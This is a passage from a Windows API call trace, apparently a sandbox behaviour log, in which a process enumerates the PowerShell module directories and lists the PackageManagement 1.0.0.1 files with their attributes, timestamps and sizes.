Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0168.969] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0xb156f8c650 | out: lpFindFileData=0xb156f8c650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b240 [0168.969] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.970] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0168.970] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0168.970] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0168.970] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0168.970] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.970] FindClose (in: hFindFile=0x1e35146b240 | out: hFindFile=0x1e35146b240) returned 1 [0168.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0168.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0168.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0168.971] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c420, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0168.971] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0xb156f8c650 | out: lpFindFileData=0xb156f8c650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0168.971] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.972] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0168.972] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0168.972] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0168.972] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0168.972] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0168.973] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0168.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0168.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0168.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0168.973] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0168.973] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146a8e0 [0168.973] FindNextFileW (in: hFindFile=0x1e35146a8e0, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.974] FindNextFileW (in: hFindFile=0x1e35146a8e0, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0168.974] FindNextFileW (in: hFindFile=0x1e35146a8e0, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.974] FindClose (in: hFindFile=0x1e35146a8e0 | out: hFindFile=0x1e35146a8e0) returned 1 [0168.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0168.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0168.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0168.974] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0168.974] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b000 [0168.975] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.975] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0168.975] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0168.975] FindClose (in: hFindFile=0x1e35146b000 | out: hFindFile=0x1e35146b000) returned 1 [0168.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0168.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0168.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0168.976] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0168.976] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8c330 | out: lpFindFileData=0xb156f8c330*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0168.976] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.976] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0168.976] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0168.977] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0168.977] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0168.977] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0168.977] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0168.978] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0168.978] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0168.978] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0168.978] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0168.979] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0168.979] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0168.979] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0168.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0168.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0168.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0168.979] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0168.979] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8c330 | out: lpFindFileData=0xb156f8c330*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b240 [0168.980] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.980] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0168.980] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, 